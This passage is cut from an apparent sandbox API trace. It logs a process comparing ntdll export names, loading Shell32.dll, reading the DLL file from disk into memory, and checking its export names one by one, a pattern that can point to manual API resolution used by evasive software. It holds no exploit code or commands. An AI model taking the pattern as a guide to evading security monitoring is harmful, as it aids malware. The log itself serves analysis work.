lpString2="CsrCaptureMessageString") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="CsrCaptureTimeout") returned 0 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="A_SHAFinal") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="A_SHAInit") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="A_SHAUpdate") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcGetHeaderSize") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcGetMessageAttribute") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcRegisterCompletionList") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcRundownCompletionList") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcUnregisterCompletionList") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="CsrAllocateMessagePointer") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="CsrCaptureMessageBuffer") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="CsrCaptureMessageString") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="CsrCaptureTimeout") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientCallServer", lpString2="CsrClientCallServer") returned 0 [0129.957] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="A_SHAFinal") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="A_SHAInit") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="A_SHAUpdate") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.957] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.958] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.958] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="AlpcGetHeaderSize") returned 1 [0129.958] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="AlpcGetMessageAttribute") returned 1 [0133.063] GetProcessHeap () returned 0x430000 [0133.063] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x412b040 | out: hHeap=0x430000) returned 1 [0133.070] GetProcessHeap () returned 0x430000 [0133.070] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449180 [0133.070] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0133.070] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0133.070] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0133.070] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0133.071] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0133.071] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0133.071] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0133.071] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0133.071] GetProcessHeap () returned 0x430000 [0133.071] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1587258) returned 0x4122040 [0133.431] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0133.431] ReadFile (in: hFile=0x140, lpBuffer=0x4122040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4122040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0137.271] CloseHandle (hObject=0x140) returned 1 [0137.272] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0137.272] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0137.272] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0137.272] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0137.272] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0137.272] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0137.273] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0137.273] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0137.273] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.273] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0137.273] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0137.273] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0137.273] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.273] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0137.273] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0137.273] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0137.273] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0137.273] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.273] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0137.273] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.273] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0137.273] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0137.273] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0137.273] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.273] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0137.273] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0137.273] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.273] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0137.274] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0137.274] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0137.274] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.274] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0137.274] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.274] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.274] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0137.274] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0137.274] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.274] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0137.274] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0137.274] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.275] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0137.275] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0137.275] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0137.276] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0137.277] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0137.278] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0137.279] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0137.280] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0137.281] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0137.281] lstrcmpA 